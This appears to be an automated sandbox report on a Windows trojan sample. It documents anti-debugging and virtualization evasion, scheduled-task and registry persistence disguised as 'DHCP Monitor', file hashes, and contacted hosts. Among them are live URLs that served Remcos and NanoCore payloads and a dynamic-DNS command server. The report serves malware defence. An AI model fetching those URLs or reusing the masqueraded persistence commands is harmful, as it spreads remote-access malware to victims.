Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	RDTSC instruction interceptor: First address: 00000000004F6455 second address: 00000000004F6455 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	RDTSC instruction interceptor: First address: 00000000004F3C04 second address: 00000000004F3C04 instructions:

Tries to detect Any.run

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	RDTSC instruction interceptor: First address: 00000000004F6455 second address: 00000000004F6455 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	RDTSC instruction interceptor: First address: 00000000004F3C04 second address: 00000000004F3C04 instructions:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6028	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 3560	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'			Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection11	Masquerading2	OS Credential Dumping	Security Software Discovery41	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	DLL Side-Loading1	Scheduled Task/Job1	Virtualization/Sandbox Evasion23	LSASS Memory	Virtualization/Sandbox Evasion23	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Disable or Modify Tools1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	System Information Discovery22	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Variant.Razy.845229.13077.exe	33%	Virustotal		Browse
SecuriteInfo.com.Variant.Razy.845229.13077.exe	36%	ReversingLabs	Win32.Trojan.Razy
SecuriteInfo.com.Variant.Razy.845229.13077.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	Metadefender		Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mtspsmjeli.sch.id	12%	Virustotal		Browse
ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin	15%	Virustotal		Browse
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mtspsmjeli.sch.id	103.150.60.242	true	true	12%, Virustotal, Browse	unknown
ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin	true	15%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.150.60.242	unknown	unknown		45325	PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID	true

Private

IP
10.2.118.40

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356594
Start date:	23.02.2021
Start time:	11:52:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Variant.Razy.845229.13077.24263 (renamed file extension from 24263 to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.evad.winEXE@13/9@7/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.8% (good quality ratio 1.2%) Quality average: 5.1% Quality standard deviation: 10.1%
HCA Information:	Successful, ratio: 83% Number of executed functions: 25 Number of non-executed functions: 4
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.104.144.132, 131.253.33.200, 13.107.22.200, 93.184.220.29, 13.64.90.137, 13.88.21.125, 92.122.145.220, 104.43.139.144, 168.61.161.212, 184.30.20.56, 51.103.5.186, 8.248.117.254, 8.253.207.120, 8.253.204.121, 8.248.147.254, 67.26.75.254, 51.104.139.180, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:57:31	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
11:57:32	Task Scheduler	Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" s>$(Arg0)
11:57:33	API Interceptor	35x Sleep call for process: RegAsm.exe modified
11:57:34	Task Scheduler	Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.150.60.242	SecuriteInfo.com.Variant.Razy.845229.27038.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Jice_remcos%202_tfkxJbdn252.bin
	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/VOP.exe
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	XP 6.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/CUN.exe
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AWT.exe
	TT.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/TT_2021_Remcos%20v2_DDoOoaFhuj99.bin
	w0JlVAbpIT.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
	3661RJTi5M.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	TgrhfQLDyB.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
	4hW0TZqN01.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Mekino_nanocore_RYgvWj50.bin
	vTQWcy77WI.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	LdOgPDsMEf.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	OXplew3YfS.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Eric_2021_XfqsmM221.bin
	pWokqkAwi2.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	FT102038332370.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/OSE.exe
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AQT.exe
	Payment Confirmation .xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AET.exe
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/UDI.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mtspsmjeli.sch.id	SecuriteInfo.com.Variant.Razy.845229.27038.exe	Get hash	malicious	Browse	103.150.60.242
	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	103.150.60.242
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	103.150.60.242
	XP 6.xlsx	Get hash	malicious	Browse	103.150.60.242
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	103.150.60.242
	TT.xlsx	Get hash	malicious	Browse	103.150.60.242
	w0JlVAbpIT.exe	Get hash	malicious	Browse	103.150.60.242
	3661RJTi5M.exe	Get hash	malicious	Browse	103.150.60.242
	TgrhfQLDyB.exe	Get hash	malicious	Browse	103.150.60.242
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	103.150.60.242
	4hW0TZqN01.exe	Get hash	malicious	Browse	103.150.60.242
	vTQWcy77WI.exe	Get hash	malicious	Browse	103.150.60.242
	LdOgPDsMEf.exe	Get hash	malicious	Browse	103.150.60.242
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	103.150.60.242
	OXplew3YfS.exe	Get hash	malicious	Browse	103.150.60.242
	pWokqkAwi2.exe	Get hash	malicious	Browse	103.150.60.242
	FT102038332370.xlsx	Get hash	malicious	Browse	103.150.60.242
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	103.150.60.242
	Payment Confirmation .xlsx	Get hash	malicious	Browse	103.150.60.242
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	103.150.60.242

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID	SecuriteInfo.com.Variant.Razy.845229.27038.exe	Get hash	malicious	Browse	103.150.60.242
	Lowes_Quotation_PN1092021.xlsx	Get hash	malicious	Browse	103.150.60.242
	4AtUJN8Hdu.exe	Get hash	malicious	Browse	103.150.60.242
	XP 6.xlsx	Get hash	malicious	Browse	103.150.60.242
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	103.150.60.242
	TT.xlsx	Get hash	malicious	Browse	103.150.60.242
	w0JlVAbpIT.exe	Get hash	malicious	Browse	103.150.60.242
	3661RJTi5M.exe	Get hash	malicious	Browse	103.150.60.242
	TgrhfQLDyB.exe	Get hash	malicious	Browse	103.150.60.242
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	103.150.60.242
	4hW0TZqN01.exe	Get hash	malicious	Browse	103.150.60.242
	vTQWcy77WI.exe	Get hash	malicious	Browse	103.150.60.242
	LdOgPDsMEf.exe	Get hash	malicious	Browse	103.150.60.242
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	103.150.60.242
	OXplew3YfS.exe	Get hash	malicious	Browse	103.150.60.242
	pWokqkAwi2.exe	Get hash	malicious	Browse	103.150.60.242
	FT102038332370.xlsx	Get hash	malicious	Browse	103.150.60.242
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	103.150.60.242
	Payment Confirmation .xlsx	Get hash	malicious	Browse	103.150.60.242
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	103.150.60.242

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	document.exe	Get hash	malicious	Browse
	w0JlVAbpIT.exe	Get hash	malicious	Browse
	Bjdl7RO0K8.exe	Get hash	malicious	Browse
	4hW0TZqN01.exe	Get hash	malicious	Browse
	d4e475d7d17a16be8b9eeac6e10b25af.exe	Get hash	malicious	Browse
	e5bd3238d220c97cd4d6969abb3b33e0.exe	Get hash	malicious	Browse
	1c2dec9cbfcd95afe13bf71910fdf95f.exe	Get hash	malicious	Browse
	Xf6v0G2wIM.exe	Get hash	malicious	Browse
	jztWD1iKrC.exe	Get hash	malicious	Browse
	wH22vdkhhU.exe	Get hash	malicious	Browse
	AqpOn6nwXS.exe	Get hash	malicious	Browse
	CklrD7MYX2.exe	Get hash	malicious	Browse
	FahZG6Pdc4.exe	Get hash	malicious	Browse
	61WlCsQR9Q.exe	Get hash	malicious	Browse
	U7DiqWP9qu.exe	Get hash	malicious	Browse
	d4x5rI09A7.exe	Get hash	malicious	Browse
	1WW425NrsA.exe	Get hash	malicious	Browse
	Kyd6mztyQ5.exe	Get hash	malicious	Browse
	xdNg7FUNS2.exe	Get hash	malicious	Browse
	14muK1SuRQ.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	4.490095782293901
Encrypted:	false
SSDEEP:	768:0P2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2wTFRJS8Ulg:HJv46yoD2BTNz1+M9GLfOw8UO
MD5:	529695608EAFBED00ACA9E61EF333A7C
SHA1:	68CA8B6D8E74FA4F4EE603EB862E36F2A73BC1E5
SHA-256:	44F129DE312409D8A2DF55F655695E1D48D0DB6F20C5C7803EB0032D8E6B53D0
SHA-512:	8FE476E0185B2B0C66F34E51899B932CB35600C753D36FE102BDA5894CDAA58410044E0A30FDBEF76A285C2C75018D7C5A9BA0763D45EC605C2BBD1EBB9ED674
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: document.exe, Detection: malicious, Browse Filename: w0JlVAbpIT.exe, Detection: malicious, Browse Filename: Bjdl7RO0K8.exe, Detection: malicious, Browse Filename: 4hW0TZqN01.exe, Detection: malicious, Browse Filename: d4e475d7d17a16be8b9eeac6e10b25af.exe, Detection: malicious, Browse Filename: e5bd3238d220c97cd4d6969abb3b33e0.exe, Detection: malicious, Browse Filename: 1c2dec9cbfcd95afe13bf71910fdf95f.exe, Detection: malicious, Browse Filename: Xf6v0G2wIM.exe, Detection: malicious, Browse Filename: jztWD1iKrC.exe, Detection: malicious, Browse Filename: wH22vdkhhU.exe, Detection: malicious, Browse Filename: AqpOn6nwXS.exe, Detection: malicious, Browse Filename: CklrD7MYX2.exe, Detection: malicious, Browse Filename: FahZG6Pdc4.exe, Detection: malicious, Browse Filename: 61WlCsQR9Q.exe, Detection: malicious, Browse Filename: U7DiqWP9qu.exe, Detection: malicious, Browse Filename: d4x5rI09A7.exe, Detection: malicious, Browse Filename: 1WW425NrsA.exe, Detection: malicious, Browse Filename: Kyd6mztyQ5.exe, Detection: malicious, Browse Filename: xdNg7FUNS2.exe, Detection: malicious, Browse Filename: 14muK1SuRQ.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z..................... .......... ........@.. ..............................N.....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:	3:QHXMKas:Q3Las
MD5:	B3AC9D09E3A47D5FD00C37E075A70ECB
SHA1:	AD14E6D0E07B00BD10D77A06D68841B20675680B
SHA-256:	7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
SHA-512:	09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:	3:QHXMKas:Q3Las
MD5:	B3AC9D09E3A47D5FD00C37E075A70ECB
SHA1:	AD14E6D0E07B00BD10D77A06D68841B20675680B
SHA-256:	7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
SHA-512:	09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
Malicious:	false
Preview:	1,"fusion","GAC",0..

C:\Users\user\AppData\Local\Temp\tmp167E.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	5.133606110275315
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mne5xtn:cbk4oL600QydbQxIYODOLedq3Ze5j
MD5:	C6F0625BF4C1CDFB699980C9243D3B22
SHA1:	43DE1FE580576935516327F17B5DA0C656C72851
SHA-256:	8DFC4E937F0B2374E3CED25FCE344B0731CF44B8854625B318D50ECE2DA8F576
SHA-512:	9EF2DBD4142AD0E1E6006929376ECB8011E7FFC801EE2101E906787D70325AD82752DF65839DE9972391FA52E1E5974EC1A5C7465A88AA56257633EBB7D70969
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp19AB.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.109425792877704
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
MD5:	5C2F41CFC6F988C859DA7D727AC2B62A
SHA1:	68999C85FC7E37BAB9216E0099836D40D4545C1C
SHA-256:	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
SHA-512:	B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.5
Encrypted:	false
SSDEEP:	3:39t:39t
MD5:	9C203C9B758291F4B1AF069610D92B5D
SHA1:	D7B825402FFFD08C882A3B05129E92D0FE964CAE
